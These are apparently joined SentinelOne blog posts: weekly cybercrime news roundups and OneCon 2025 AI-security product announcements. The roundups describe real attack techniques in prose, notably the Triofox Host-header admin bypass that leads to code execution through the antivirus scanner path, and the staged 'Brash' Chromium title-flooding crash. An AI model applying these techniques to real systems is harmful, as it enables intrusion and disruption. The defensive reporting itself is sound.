This is a fundamental redefinition of what managed security can achieve when human ingenuity and agentic AI move in sync. Aligning intelligence, technology, and human judgment in a single adaptive defense, Wayfinder raises the bar for what true managed security must deliver.

Conclusion | Proactive & Scalable Defense Starts Now

The future of cybersecurity belongs to organizations that can see farther ahead, move faster, and act with confidence. Attackers are only becoming more automated and opportunistic, meaning SOCs need more than tools – they need a combination of the right intelligence translated by trusted experts and partnership when incidents arise.

As announced at OneCon 2025, Wayfinder joins human expertise, agentic AI, and Google Threat Intelligence to deliver a multi-layered human + AI defense model that helps customers fill in their skill gaps, elevate teams, and strengthen their posture immediately.

Wayfinder TDR is the next evolution of SentinelOne’s services portfolio, combining threat hunting, managed detection, and incident response into a force multiplier to empower organizations in regaining control and reducing daily risk.

Shift the advantage back to the defending side with Wayfinder – watch an overview here and book a demo to get started.

The Good | Courts Prosecute DPRK Fraud, Ransomware Hosting & Crypto Mixer Ops

Five people have pleaded guilty to helping the DPRK run illicit revenue schemes involving remote IT worker fraud and cryptocurrency theft. The group enabled North Korean operatives to obtain U.S. jobs using false or stolen identities, generating over $2.2 million while impacting 136 companies. The DOJ is also seeking forfeiture of $15 million tied to APT38 cyber-heists. The defendants, Oleksandr Didenko, Erick Prince, Audricus Phagnasay, Jason Salazar, and Alexander Travis, admitted to stealing U.S. identities for overseas workers and laundering stolen funds.

In the U.S., U.K., and Australia, authorities have issued a coordinated sanction against Russian bulletproof hosting (BPH) providers that enable ransomware groups by leasing servers to support malware delivery, phishing attacks, and illicit content hosting. To help cybercriminals evade capture, BPH services ignore abuse reports and law enforcement takedowns. OFAC has sanctioned Media Land, its sister companies, and three executives all tied to LockBit, BlackSuit, Play, and other threat groups. Five Eyes agencies also released guidance to help ISPs detect and block malicious infrastructure used by BPH services.

Our joint guidance on bulletproof hosting providers highlights best practices to mitigate potential cybercriminal activity, including recommended actions that ISPs can implement to decrease the usefulness of BPH infrastructure. Learn more https://t.co/cGQpuLpBPP pic.twitter.com/tM55acfuQv

— CISA Cyber (@CISACyber) November 19, 2025

The founders of Samourai Wallet, a cryptocurrency mixing service, have been sentenced to prison for laundering over $237 million. Operating since 2015, Samourai used its ‘Whirlpool’ mixing system and ‘Ricochet’ multi-hop transactions to obscure Bitcoin flows. These features made tracing more difficult and enabled criminals involved in darknet markets, drug trafficking, and cybercrime to launder more than $2 billion. Authorities seized the platform, including its servers, domains, and mobile app, while the founders agreed to forfeit all traceable proceeds. CEO Keonne Rodriguez has received five years, while CTO William Lonergan Hill received four along with supervised release. The pair were ordered to pay fines of $250,000 each.

The Bad | DPRK Actors Build Fake Job Platform to Lure AI Talent & Push Malware

As part of their ongoing and evolving Contagious Interview campaign, DPRK-based threat actors have created a fake job platform designed to compromise legitimate job seekers, particularly in the AI research, software development, and cryptocurrency verticals. While earlier fraudulent IT-worker schemes relied on targeting individuals through phishing on social media platforms, the latest tactic weaponizes a fully functional hiring pipeline.

Researchers discovered the latest lure – a Next.js-based job portal hosted at lenvny[.]com, complete with dozens of fabricated AI and crypto-industry job listings. The listings mimic branding from major tech companies and feature a polished UI and full recruitment workflow that mirrors modern hiring systems, encouraging applicants to submit resumes and professional links before prompting them to record a video introduction.

This final step triggers the DPRK-favored ClickFix technique: When applicants copy the fake interview instructions, a hidden clipboard hijacker swaps their text with a multi-stage malware command. When pasted into a terminal, it downloads and executes staged payloads under the guise of a “driver update”, ultimately launching a VBScript-based loader. This design blends seamlessly with typical remote-work interview processes and dramatically increases the likelihood of accidental execution.

The platform also performs strategic filtering, attracting AI and crypto professionals specifically as their skills, network access, and workstation devices tend to align with DPRK’s intelligence and financial priorities including model-training infrastructure to crypto exchange systems. The campaign reflects significant maturation in DPRK social engineering tradecraft, pairing high-fidelity UI design with covert malware delivery. Job seekers are advised to verify domains, avoid off-platform hiring systems, and execute any requested code only in sandboxed environments.

The Ugly | Iran-Backed Actors Weaponize Cyber Recon to Power Real-World Attacks

Iranian-linked threat actors are using cyber operations to support real-world military activity, a pattern described by researchers as “cyber-enabled kinetic targeting”.

In the past, conventional security models separated cyber and physical domains – delineations that are proving artificial in today’s socioeconomic and political climate. Now, these are not just cyber incidents that cause physical impact, but rather coordinated campaigns upon which digital operations are built to advance military objectives.

One example involves Crimson Sandstorm (aka Tortoiseshell and TA456), a group tied to Iran’s Islamic Revolutionary Guard Corps (IRGC). Between December 2021 and January 2024, the group probed a ship’s Automatic Identification System (AIS) before expanding their operations to other maritime platforms. On January 27, 2024, the group searched for AIS location data on one particular shipping vessel. Days later, that same ship was targeted in an unsuccessful missile strike by Iranian-backed Houthi forces, which have mounted repeated missile attacks on commercial shipping in the Red Sea amid the Israel–Hamas conflict.

A second case highlights Mango Sandstorm (aka Seedworm and TA450), a group affiliated with Iran’s Ministry of Intelligence and Security (MOIS). In May, the group set up infrastructure for cyber operations and gained access to compromised CCTV feeds in Jerusalem to gather real-time visual intelligence. Just a month later, the Israel National Cyber Directorate confirmed Iranian attempts to access cameras during large-scale attacks, reportedly to get feedback on where the missiles hit and improve precision. Both highlighted cases show the attackers’ reliance on routing traffic through anonymizing VPNs to prevent attribution.

The divide between digital intrusions and physical warfare continues to blur. With nation state groups leveraging cyber reconnaissance as a precursor for physical attacks, it is likely we will continue to see significant developments in this kind of hybrid warfare.

The Good | FBI and Europol Arrest Ransomware Broker and Dismantle Major Botnet

Russian national, Aleksey Olegovich Volkov, is set to plead guilty for acting as an initial access broker (IAB) for Yanluowang ransomware attacks targeting at least eight U.S. companies from July 2021 to November 2022.

Using aliases like “chubaka.kor” and “nets”, Volkov sold access to the ransomware group after breaching his victim’s corporate networks and demanding ransoms from $300,000 to $15 million in Bitcoin. FBI investigators traced Volkov through iCloud, cryptocurrency records, and social media, recovering chat logs, stolen credentials, and evidence of ransom negotiations, which all linked him to $1.5 million in collected payments.

His breaches affected companies across multiple states, including banks, engineering firms, and telecoms. Volkov faces up to 53 years in prison and over $9.1 million in restitution for charges including trafficking in access, identity theft, computer fraud, and money laundering.

Law enforcement agencies across several countries dismantled over 1000 servers linked to the Rhadamanthys infostealer, VenomRAT, and Elysium botnet as part of Operation Endgame, an international effort against cybercrime. Coordinated by Europol and Eurojust with support from private partners, the action consisted of searches at 11 locations in Germany, Greece, and the Netherlands, where officers seized 20 domains and arrested a key VenomRAT suspect.

The disrupted infrastructure involved hundreds of thousands of infected devices and millions of stolen credentials, including access to over 100,000 crypto wallets. Rhadamanthys, active since 2023, had seen rapid growth in late 2025, affecting thousands of IP addresses daily.

Authorities recommend checking systems for infection via politie.nl/checkyourhack and haveibeenpwned.com. Operation Endgame has previously disrupted numerous malware and ransomware networks, including Bumblebee, IcedID, Pikabot, Smokeloader, SystemBC, and Trickbot, highlighting ongoing international efforts to curb cybercrime.

The Bad | UNC6485 Exploits Triofox Vulnerability for Remote Code Execution

Threat actors have exploited a critical vulnerability in Gladinet’s Triofox file sharing and remote access platform, chaining it with the product’s built-in antivirus scanner to gain SYSTEM-level remote code execution (RCE).

The vulnerability, tracked as CVE-2025-12480, allows attackers to abuse an access control logic error that grants admin privileges when the request host equals ‘localhost’. By spoofing this value in the HTTP host header, an attacker can reach sensitive setup pages without credentials, especially on systems where the TrustedHostIp parameter was never configured.

Security researchers first discovered an intrusion in August targeting a Triofox instance running version 16.4.10317.56372. They later determined that the threat cluster UNC6485 used a malicious HTTP GET request containing a localhost header to access the AdminDatabase.aspx setup page.

Using this workflow, the attackers created a rogue administrator account called ‘Cluster Admin’, uploaded a malicious script, and configured Triofox to treat that script as the antivirus scanner path. Since the scanner inherits SYSTEM-level privileges from the parent process, this allowed the attackers to execute arbitrary code.

The payload then launches a PowerShell downloader to retrieve a Zoho UEMS installer, which subsequently deploys Zoho Assist and AnyDesk on the compromised host for remote access and lateral movement. The attackers were also observed using Plink and PuTTY to establish SSH tunnels and forward traffic to the compromised host’s RDP port.

Gladinet has since fixed CVE-2025-12480 in Triofox version 16.7.10368.56560, and administrators are urged to update to the latest release (16.10.10408.56683), review admin accounts, and ensure the antivirus engine is not configured to run unauthorized binaries.

The Ugly | Attackers Exploit Zero-Day to Steal Washington Post Employee Data

The Washington Post, one of the vendors impacted by a breach targeting Oracle software, is notifying nearly 10,000 current and former employees and contractors that their personal and financial information has been exposed in the data theft campaign.

The Post, one of the largest U.S. newspapers with 2.5 million digital subscribers, confirmed that attackers accessed parts of its network between July 10 and August 22 by exploiting a previously unknown zero-day vulnerability in Oracle E-Business Suite, the organization’s internal enterprise resource planning (ERP) system. The vulnerability is tracked as CVE-2025-61884.

According to the letter sent to affected individuals, the Post learned of the intrusion after a threat actor contacted the company on September 29 claiming access to its Oracle applications. Post-breach investigations identified the widespread flaw that allowed the attackers to access many Oracle customers’ applications. The attackers used this flaw to steal sensitive data and later attempted to extort the Post and other organizations breached in the same campaign.

Although the Post did not name the group responsible, the Cl0p ransomware operation is suspected to be behind the attacks. Other high-profile victims of the same Oracle zero-day include Harvard University, Envoy Air, and GlobalLogic, with additional impacted organizations listed on Cl0p’s leak site.

The Post’s investigation has determined that data belonging to 9,720 individuals was compromised. Exposed information includes full names, Social Security numbers, tax and ID numbers, and bank account and routing numbers. Impacted individuals have been offered 12 months of free identity protection through IDX and advised to place credit freezes on their accounts and fraud alerts for additional protection.

The Good | Authorities Crack Down on Ransomware, Crypto Fraud & DPRK Laundering Ops

Three ex-employees of cybersecurity firms DigitalMint and Sygnia have been indicted for participating in BlackCat (aka ALPHV) ransomware attacks on five U.S. companies between May and November 2023.

The defendants allegedly acted as BlackCat affiliates, breaching networks, stealing data, deploying encryption malware, and demanding cryptocurrency ransoms. Victims included medical, pharmaceutical, and engineering firms. Prosecutors say the ransom demands ranged from $300,000 to $10 million, with one company paying out $1.27 million. The trio faces up to 50 years each in prison if convicted.

Also this week, the U.S. Treasury sanctioned two North Korean financial institutions and eight individuals for laundering cryptocurrency stolen via fraudulent IT worker schemes. The designated include Ryujong Credit Bank and Korea Mangyongdae Computer Technology Company (KMCTC), along with executives and bankers responsible for managing funds linked to ransomware attacks and UN sanctions violations.

OFAC says that over the last 3 years DPRK-affiliated cybercriminals have stolen more than $3 billion in cryptocurrency using malware and social engineering. The sanctions freeze U.S. assets and warn that transactions with these entities risk secondary penalties.

In Europe, authorities have arrested nine suspects involved in a cryptocurrency fraud network responsible for stealing over €600 million ($689 million) across multiple countries. The criminals allegedly created fake crypto investment platforms that promised high returns and recruited victims through social media, cold calls, and fake endorsements from celebrity investors. Victims lost their funds while the suspects laundered the stolen assets using blockchain tools. In operations coordinated by Eurojust in Cyprus, Spain, and Germany, law enforcement seized cash, crypto, and bank accounts.

The Bad | SleepyDuck Trojan Exploits Ethereum Smart Contracts to Evade Takedown

A new remote access trojan (RAT) dubbed ‘SleepyDuck’ has been masquerading as a well-used Solidity extension on the Open VSX open-source registry, researchers say. The malware uses Ethereum smart contracts to manage its command and control (C2) communications, helping it to maintain persistence even if its main server is taken down.

Initially benign when published on October 31, the infected extension, juan-bianco.solidity-vlang, became malicious after an update made the following day, by which time it had already been downloaded 14,000 times. For now, the extension remains available on Open VSX with a public warning. In total, it has been downloaded over 53,000 times.

Security researchers report that SleepyDuck activates when the code editor starts, a Solidity file opens, or when a compile command runs. It disguises its malicious activity through a fake webpack.init() function from extension.js, while secretly executing payloads that collect system information such as hostnames, usernames, MAC addresses, and timezones.

After it is triggered, the trojan queries the Ethereum blockchain to find the fastest RPC provider, read its C2 details, and enter a polling loop for new instructions. This blockchain-based C2 redundancy means that even if the main C2 domain (sleepyduck[.]xyz) is disabled, the malware can still fetch updated addresses or commands from the blockchain, making takedown efforts much more difficult.

In response, Open VSX has introduced new security measures, including shorter token lifetimes, automated scans, revoking any leaked credentials, and working in coordination with VS Code to block emerging threats. Best practices for developers include verifying extension publishers and installing software only from trusted repositories to avoid supply-chain compromises.

The Ugly | Iran-Based Actors Target U.S. Policy Experts in New Espionage Campaign

Between June and August, a newly identified threat cluster dubbed ‘UNK_SmudgedSerpent’ launched a series of targeted cyberattacks against U.S.-based academics and foreign policy experts focused on the Middle East. The campaign, coinciding with rising Iran-Israel tensions, uses politically-themed lures related to Iranian domestic affairs and the militarization of the Islamic Revolutionary Guard Corps (IRGC).

Researchers say the threat actors behind the campaign initiated attacks with benign email exchanges before introducing phishing links impersonating prominent U.S. foreign policy figures and think tank institutions like the Brookings Institution and Washington Institute.

The targeted victims, over 20 U.S.-based experts on Iran-related policy, were enticed to open malicious meeting documents and login pages designed to harvest their Microsoft account credentials. In some attacks, the attackers sent URLs leading to fake MS Teams login pages but pivoted to spoofed OnlyOffice sites if the victim grew suspicious.

Clicking the links led to the download of malicious MSI installers disguised as Microsoft Teams, which then deployed legitimate remote monitoring and management (RMM) software like PDQ Connect. Subsequent activity suggests attackers manually installed additional tools such as ISL Online, indicating possible hands-on-keyboard intrusion.

Researchers note that the operation’s tactics mirror those of known Iranian cyberespionage groups such as TA455 (aka UNC1549, Smoke Sandstorm), TA453 (aka TunnelVision, APT 35, UNC788), and TA450 (aka TEMP.Zagros).

The researchers believe UNK_SmudgedSerpent’s campaigns are part of a broader collection effort by Iranian intelligence aimed at gathering insights from Western experts on regional policy, academic analyses, and strategic technologies.

Every major technology revolution begins the same way: Promise, panic, and potential.

The internet gave us connection. Cloud gave us scale. AI is giving us cognition – systems that can reason, decide, and act.

Firewalls helped the internet era. Workload protection helped the cloud era. And, in the AI era, you have AI Security.

This is a new field and frontier that requires mastering two disciplines at once.

• Security for AI – Governing and protecting the usage of AI itself. Models, data, agents, and the users and developers who rely on them. In many cases, this is also done by AI.
• AI for Security – Applying agentic AI and machine learning to solve today’s biggest cybersecurity challenge: Staying ahead of AI-powered attacks by detecting, investigating, and responding at machine speed.

Most importantly, in this era, the architecture and infrastructure needed to truly benefit from AI will be the determining factor to successfully secure it. Quality of data, inclusivity of data, cardinality, and latency will be critical, as will be the tools and technologies facilitating those.

At OneCon 2025, we are laying out a practical path to secure this new world. The opportunities AI creates, the risks it introduces. The strategy and product innovation you can put to work today to accelerate and de-risk your AI journey.

AI: Business Accelerant & New Attack Surface

The need for these dual disciplines is driven by the rapid increase in AI usage itself – both by good and bad forces.

AI is accelerating everything. It is transforming how businesses operate, how employees work, and how attackers adapt. Across every single industry, AI is becoming embedded into processes, tools and workflows in every team. Marketing teams use it to generate content. Developers use it to write code. Legal, HR and finance all use it to summarize and automate tasks. AI is now woven into the very fabric of how organizations think and operate.

While holding incredible potential benefits, this transformation is also introducing massive new security risks. Traditional security controls are blind to the data that employees are entering into 3rd-party AI models. Security teams lack visibility into the growing ecosystem of AI tools and assistants spreading across every single enterprise. AI-based browsers that integrate chat or summarization features create new pathways for data exposure. And the rise of Model Context Protocol (MCP) servers that connect agents to agents introduces an entirely new layer of risk that most organizations are not equipped to monitor or govern today.

Meanwhile, adversaries are evolving just as quickly. They are using AI to increase efficiency, precision, and their reach. Non-native English speakers can now craft a convincing, localized spearphishing campaign in minutes. LLMs are being used to write polymorphic malware that mutates faster than traditional defenses can react. Attackers are automating their reconnaissance, identifying vulnerabilities through natural language interfaces, and even embedding AI models directly inside malware to adapt in real time.

The result is a security gap that spans both sides of the equation – on one side, AI as a catalyst for real business innovation and, on the other, AI as an enabler of attack and massive risk exposure.

Building Security in the Age of AI: Three Critical Principles

Protecting this new world requires visibility, intelligent automation, and governance that can move at the same speed as AI itself. In solving for that, we believe in a simple yet critical guiding philosophy to delivering effective AI Security – three critical principles that inform everything that we build and anchor any platform-level defense.

1. Intelligence Over Rules – Security must think, not react. Static signatures and brittle logic can’t match the velocity of modern threats. True protection emerges when AI continuously learns, reasons, and adapts — detecting intent, not just pattern.
2. Autonomy with Accountability – Machines should act at machine speed, but always within human-defined guardrails and system supervision. The future of defense is autonomous, but never ungoverned where AI decisions remain explainable, traceable, and aligned with human values.
3. Unity of Data, Context, and Action – Effective AI security fuses signals from endpoints, identities, and clouds into one coherent understanding. Insight without context is noise; action without context is chaos. The synthesis of both creates real-time, end-to-end resilience.

These principles map directly to the questions customers ask us every day.

How do I better defend my organization?

How do I outpace threats?

How do I get the most from my people and partners?

SentinelOne’s AI Advantage

When it comes to making AI Security real today, SentinelOne is in a unique position. We have been AI-native since day one. Automation has been foundational from the start, not a bolt-on. And, we’ve been using agentic approaches and workflows in live security environments before it became the buzzword du jour.

At launch, we were among the first to apply machine learning to malware detection and prevention. That broke the decades-old pattern of pushing static signatures to endpoints many times a day. Instead of distributing new rules after every outbreak, we trained lightweight predictive models that identified malicious behavior on their own. That meant detecting never-before-seen threats in real time at massive scale.

That innovation reshaped endpoint security and set the foundation for what followed. The same principles of data-driven models, autonomous decision making, and behavioral analytics evolved into the Singularity Platform and now power Purple AI, our agentic system that changes how analysts detect, investigate, and respond. Together, they extend protection and intelligence across endpoint, identity, cloud, and AI. It is an entire platform built on and enhanced by AI. This is how we keep our customers safe: By delivering real time security that is predictive and adaptive, at planet scale.

This year we took the next step with two focused acquisitions:

• Prompt Security – A portfolio built to secure AI use cases and protect how employees, developers, and applications leverage generative and agentic AI. This is a critical component of protecting AI as an attack surface itself.
• Observo AI – An AI-ready streaming data pipeline that intelligently filters, normalizes, and ingests petabytes of telemetry across the enterprise with sub-second latency and strong cost efficiency. Combined with Singularity AI SIEM, this provides both pre-ingestion analytics and flexible pull/stream data collection, ensuring complete visibility, real-time detections and autonomous response across the entire security environment.

These advancements extend Singularity into a unified AI Security architecture that gives defenders a complete, autonomous view across traditional and emerging surfaces – from premise to cloud.

Delivering on the AI Security Vision Today

Today at OneCon, we’re not just giving customers a roadmap and strategy, we’re giving them new tools and innovation to start securing their AI-enterprise today, including:

• New solutions from Prompt Security to secure AI apps, tools, developers and agents – Real-time visibility and policy enforcement across thousands of AI tools. Shadow AI discovery, data loss prevention for prompts and outputs, safe coding with secret redaction and vulnerable code blocking, and protection for internal AI applications.
• Purple AI innovations – Integrated agentic auto-investigations with dynamic runbooks. Next best actions on alerts. One-click custom detection rule creation that turns investigation outcomes into durable detections. Integration with Singularity Hyperautomation for approved response.
• Purple AI MCP Server – A secure bridge between Singularity’s live intelligence and your AI ecosystem. Build your own agents grounded in your security context. Use OpenAI, Anthropic, Gemini, or internal models. Innovate securely at scale. The MCP Server is open source and available on GitHub today.
• Observo AI pipelines and integration with Singularity AI-SIEM – Vendor-agnostic data engine for any source to any destination. When paired with Singularity AI SIEM, Observo supercharges detection and response with high-fidelity, cost-efficient streaming telemetry.
• Wayfinder Threat Detection and Response with Google Threat Intelligence – Global insight combined with automation and human expertise. GTI visibility feeds directly into SentinelOne services. Intelligence becomes action through Purple and our analysts. Faster, more precise response as a matter of process, not hope.
• Platform upgrades:
  • Native scalability to million+ active agents in a single deployment. Faster policy updates with minute command SLA.
  • Agent efficiency improvements across operating systems. Lower CPU and memory usage, fewer support cases, better user experience.
  • AI SIEM query engine overhaul that supports very high cardinality and keeps up to seven years of security data hot. Natural language search in Purple AI operates on the same high performance data. No cold storage delays.
  • Live Security Updates upgrades that dramatically reduce response times, and improve accuracy and efficacy.  And more customer controls for safe rollout.
  • Thousands of new detections continually delivered, from the AI-SIEM to the endpoint agent. We’re wherever the adversary moves, delivering real-time protection across dozens of surfaces and data sources. With AI infused into every layer of our operations, we’re moving faster, scaling further, and stopping even unknown threats with greater precision than ever before.
  • New Infrastructure as Code (IaC) deployment processes, better observability across the platform, and proactive communications on incidents via a public status page have all been added to bolster resilience, reliability and transparency.
  • Active monitoring mode and proactive alerting extends resilience outside the SaaS operation into the Endpoint agent, providing near real-time health metrics of the agents themselves – now transparently available for the customer visibility in the agent management control plane.

The Path Forward in AI Security: Advancing Humanity, Protecting the Human

AI security is more than just defending systems, it’s about defending the fabric of trust that lets humans thrive in a digital world. As intelligence becomes ambient and autonomous, security must evolve from a reactive layer into an enabling force for human progress.

• Empowering Human Potential – By offloading complexity and noise to intelligent machines, AI security frees humans to focus on creativity, empathy, and purpose. Protection becomes invisible, a silent force amplifying human capability rather than constraining it.
• Preserving Digital Integrity – As data becomes identity, securing truth is a moral imperative. AI security safeguards the authenticity of information, ensuring societies can rely on what they see, share, and believe. As our lives move fully into digital spaces, the boundary between human and machine expression blurs. Every action carries traces of who we are. In this new reality, AI Security’s role is to safeguard that trust: To ensure that what we see, share, and decide upon is authentic. It means protecting the fidelity of data, the truth of identities, and the integrity of digital interactions against manipulation. It is the contract to our reality.
• Building Ethical Autonomy – The next era demands systems that defend not only themselves, but the people they serve. Ethical AI security means designing intelligence that understands context, respects privacy, and acts in humanity’s best interest even when no one is watching.

Ultimately, the path forward fuses human and artificial intelligence into a shared defense, machines protecting people, and people guiding machines, so that technology remains our most trusted ally, not our greatest risk.

Defenders deserve a technology that protects every surface, that can see everything, turns data into advantage, and puts human governance at the center. So, let’s get started.

AI for Security. Security for AI. Autonomous protection, always evolving, in production, today, all in pursuit of a safer, brighter future.

Today, on the main stage at OneCon 2025, SentinelOne is taking the wraps off its vision, roadmap, and new portfolio for securing an AI-powered world. From securing AI tools, applications, and agents to transforming and automating security operations, SentinelOne’s AI Security strategy and new innovations will help customers accelerate and de-risk their AI advantage.

Introducing a new portfolio for securing AI, new AI-ready data pipelines, the expansion of Purple AI, SentinelOne’s category-best agentic security analyst, the debut of new AI-powered threat detection and response managed services, and more, the new innovations revealed at OneCon 2025 will focus on how our customers and partners can both secure AI systems and achieve autonomous security today.

Securing AI: New Prompt Security Offerings

At OneCon 2025, SentinelOne is putting customers in control of AI in their organization by introducing a new suite focused on securing known and shadow GenAI use, coding, data leakage, agents and more.

• Prompt Security for Employees – Delivers real-time visibility and control over employee GenAI usage. Supporting more than 15,000 AI sites, it detects and eliminates shadow AI risks and prevents sensitive data exposure.

• Prompt Security for AI Code Assistants – Secures the use of GenAI coding tools by instantly redacting secrets, PII, and IP from code to prevent data leaks. Its real-time Vulnerable Code Scanner blocks insecure or malicious AI-generated outputs before production, helping developers code faster and safer while maintaining organizational control and compliance.

• Prompt Security for AI Applications – Protects custom-built AI solutions, from chatbots to complex automations, against emerging threats like denial-of-wallet and remote code execution (RCE).

• Prompt Security for Agentic AI (Beta) – Provides real-time visibility, risk assessment, and governance for autonomous AI agents built on the Model Context Protocol (MCP) – the first comprehensive solution to secure, monitor, and control agentic AI operations at machine speed.

New AI-Ready Data Pipeline: Integrating Observo AI & Singularity AI SIEM

Following the recent acquisition of Observo AI, SentinelOne is introducing the first integration into its Singularity Platform, giving customers a new AI-native data platform to reimagine how they collect, enrich, and act on data across their entire security ecosystem and power their agentic security operations.

Observo AI’s Integration with Singularity AI SIEM, unites intelligent AI-native streaming data control with agentic AI-powered analytics and orchestration, optimizing data pipelines for enhanced threat detection and autonomous response across all security data. Observo AI efficiently ingests and normalizes petabytes of data from any source, then prioritizes and routes what matters most into Singularity AI SIEM. This unique, transformative combination creates the only SIEM on the market to provide both pre-ingestion analytics and flexible pull/stream data collection.

Expanding Purple AI & New Model Context Protocol Innovations

SentinelOne will also showcase the latest advancements in Purple AI’s agentic triaging, investigations, and workflows, bringing together human-level reasoning with orchestration and automated response. Building on Purple’s agentic roadmap, the capabilities are focused on cutting detection, investigation, and response from hours to minutes for analysts.

• In-line Agentic Auto-investigations with Dynamic Reasoning (Preview) – End-to-end one-click agentic investigations spanning discovery, alert assessment, hypothesis validation, impact analysis, recommended response, and proactive custom rule creation. Purple AI shifts the paradigm from human work assisted by AI to AI work approved by humans, with every step and conclusion clearly documented in a single investigation canvas for human approval.

• Automated and agentic investigations and response through Purple AI’s integration with Singularity Hyperautomation for Agentic Investigations & Response Actions (Preview) – Purple AI seamlessly integrates with Singularity Hyperautomation to execute pre-approved customer workflows to both conduct its agentic investigations, validating hypotheses via actions such as contacting human defenders via Slack, and to agentically surface pre-approved recommended actions to execute.

• Agentic Custom Detection Rule Creation (Preview) – In the investigation pane, analysts can receive agentically recommended custom detection rules that can be created with a single click, enabling security teams to immediately identify and stop similar attacks before they spread.

• Purple AI Model Context Protocol (MCP) Server (Generally Available) – Provides secure, seamless integration between the Singularity Platform and any AI framework or large language model. Acting as a universal translator and intelligence hub, it empowers developers and partners to build custom agentic AI experiences powered by the full context and analytics of SentinelOne’s platform. The open-source Purple AI MCP Server is available today on GitHub.

Managed Services for the AI Era: Wayfinder Threat Detection & Response

Wayfinder combines elite human expertise with agentic AI to deliver next-generation managed services. Built on SentinelOne’s telemetry and Google Threat Intelligence, Wayfinder provides AI-powered threat hunting, MDR, and incident response, enabling faster detection, smarter response, and adaptive defense – empowering teams to focus on high-value priorities.

Managing Attack Paths: Mapping Risks & Securing Cloud Data

As cloud-native AI services gain adoption, SentinelOne is advancing unified exposure management with an upcoming release of Cloud Attack Paths and Data Security Posture Management (DSPM) in Singularity Cloud Security. Together, these capabilities deliver an intelligent cloud defense – mapping how interconnected exposures create exploitable pathways to sensitive data. By revealing critical exposures, Singularity Cloud Security empowers threat analysts to see what attackers see, anticipate lateral movement, and eliminate risks wherever they originate and before they can take shape. With AI-powered protections, deflect threats in real time and stop attacks in their tracks

Contextualizing the Identity Surface: Singularity Identity

The next evolution of Singularity Identity is here: a comprehensive solution that unifies all of SentinelOne’s identity security capabilities into one cohesive and contextual security experience. Delivering real-time detection and response, continuous posture assessments, and proactive risk management across hybrid environments, our solution uncovers threats faster while providing security teams with full visibility and protection across their environment. Our full identity profile now features policy-based conditional access – now in beta and purpose-built for dynamic, zero-trust environments.

Conclusion

OneCon25 showcases the next chapter in cybersecurity. With many innovations showcased this year, SentinelOne is delivering AI-native solutions that transform detection, response, and protection across endpoints, cloud, and enterprise systems. By combining automation, intelligence, and human expertise, organizations can act faster, secure smarter, and embrace AI-driven innovation without compromise, making the vision of autonomous, adaptive security a reality today.

Forward Looking Statements

This blog post includes forward-looking statements including, but not limited to, statements concerning our current and future products and services. Forward-looking statements are subject to risks and uncertainties that could cause actual performance or results to differ materially from those expressed in or suggested by the forward-looking statements. These and other risk factors are described in the “Risk Factors” section of our most recent Annual Report on Form 10-K, subsequent Quarterly Reports on Form 10-Q, and other filings made with the U.S. Securities and Exchange Commission (SEC), which are available free of charge on the SEC’s website at www.sec.gov.

You are cautioned not to place undue reliance on these forward-looking statements. Any future products, functionality and services may be abandoned or delayed, and as such, you should make decisions to purchase products and services based on features that are currently available. Any forward-looking statements made in this document are based on our beliefs and assumptions that we believe to be reasonable as of the date hereof. Except to the extent required by law, we undertake no obligation to update these forward-looking statements to reflect new information or future events.

The Good | Former GM of DoD Contractor Pleads Guilty to Selling U.S. Cyber Secrets

Peter Williams, a former general manager at U.S. defense contractor L3Harris Trenchant, has pleaded guilty in U.S. federal court to two counts of stealing and selling classified cybersecurity tools and trade secrets to a Russian exploit broker.

Between 2022 and 2025, Williams stole at least eight restricted cyber-exploit components that were developed for the U.S. government and select allied partners. The DoJ stated that these tools, valued at $35 million, were part of Trenchant’s sensitive research and were never intended for foreign sale. Williams sold them for at least $1.3 million in cryptocurrency, signing formal contracts with the Russian intermediary for the initial sale of the components as well as a promise to provide follow-on technical support. Williams used the illicit proceeds to purchase luxury items, according to court filings.

Trenchant, L3Harris Technologies’ cyber capabilities arm, develops advanced offensive and defensive tools used by government agencies within the Five Eyes intelligence alliance. According to the DoJ, Williams abused his privileged access at Trenchant Systems to siphon the data, giving various customers of the broker, including the Russian government and other foreign cyber threat actors, an edge in targeting U.S. citizens, businesses, and critical infrastructure.

While the court reports did not name the broker, prior reporting suggests it may be Operation Zero, a Russian platform known for buying and reselling zero-day exploits, often rewarding developers with large cryptocurrency payouts.

Williams now faces up to 10 years in prison and fines of $250,000 or twice the profit gained. As international cyber brokers expand in their roles as international arms dealers, law enforcement officials reaffirm their hard stance against malicious insiders abusing their positions of trust.

The Bad | New “Brash” Flaw Crashes Chromium Browsers with Timed Attacks

Security researcher Jose Pino has disclosed a severe vulnerability in Chromium’s Blink rendering engine that allows attackers to crash Chromium-based browsers within seconds. Pino has named the vulnerability “Brash” and attributes it to an architectural oversight that fails to rate-limit updates to the document.title API. Without the rate-limiting, an attacker can generate millions of document object model (DOM) mutations per second by repeatedly changing the page title, overwhelming the browser, and consuming CPU resources until the UI thread becomes unresponsive.

The Brash exploit occurs in three phases. First, the attacker prepares a hash seed by loading 100 unique 512-character hexadecimal strings into memory to vary title updates and maximize the impact of the attack. Then, the attacker launches burst injections that perform three consecutive document.title updates in a row, which in default test settings inject roughly 24 million updates per second using a burst size of 8,000 and a 1 ms interval. Lastly, the sustained stream of updates saturates the browser’s main thread, forcing both the tab and the browser to hang or crash and requiring forced termination.

Brash can be scheduled to run at precise moments, enabling a logic-bomb style attack that remains dormant until a timed trigger activates. This increases the danger since attackers can control when the large-scale disruption will occur. Hypothetically, a single click on a specially crafted URL can detonate the attack with millisecond accuracy and little initial indication.

The vulnerability affects Google Chrome and all Chromium-based browsers, including Microsoft Edge, Brave, Opera, Vivaldi, Arc, Dia, OpenAI ChatGPT Atlas, and Perplexity Comet. WebKit-based browsers such as Mozilla Firefox and Apple Safari are not vulnerable to Brash as well as any iOS third-party browsers.

The Ugly | Hacktivists Manipulate Canadian Industrial Systems, Triggering Safety Risks

The Canadian Centre for Cyber Security has issued a warning that hacktivists have breached multiple critical infrastructure systems across Canada, altering industrial controls in ways that could have created dangerous conditions. The alert highlights rising malicious activity that targets internet-exposed Industrial Control Systems (ICS) and urges firms to shore up their security measures to prevent such attacks.

The bulletin cites three recent incidents. In the first, a water treatment facility experienced tampering with water pressure controls, degrading service for the local community. Following that, a Canadian oil and gas company had its Automated Tank Gauge (ATG) manipulated, triggering false alarms. In a third breach, a grain drying silo on a farm had temperature and humidity settings altered, creating potentially unsafe conditions if the changes had gone undetected.

Authorities believe these attacks were opportunistic rather than being technically sophisticated, and intended to attract media attention, underme public trust, and harm the reputation of Canadian authorities. Hacktivists have been known to collaborate with advanced persistent threat (APT) groups to amplify the reach of disruptive acts and cause public unrest.

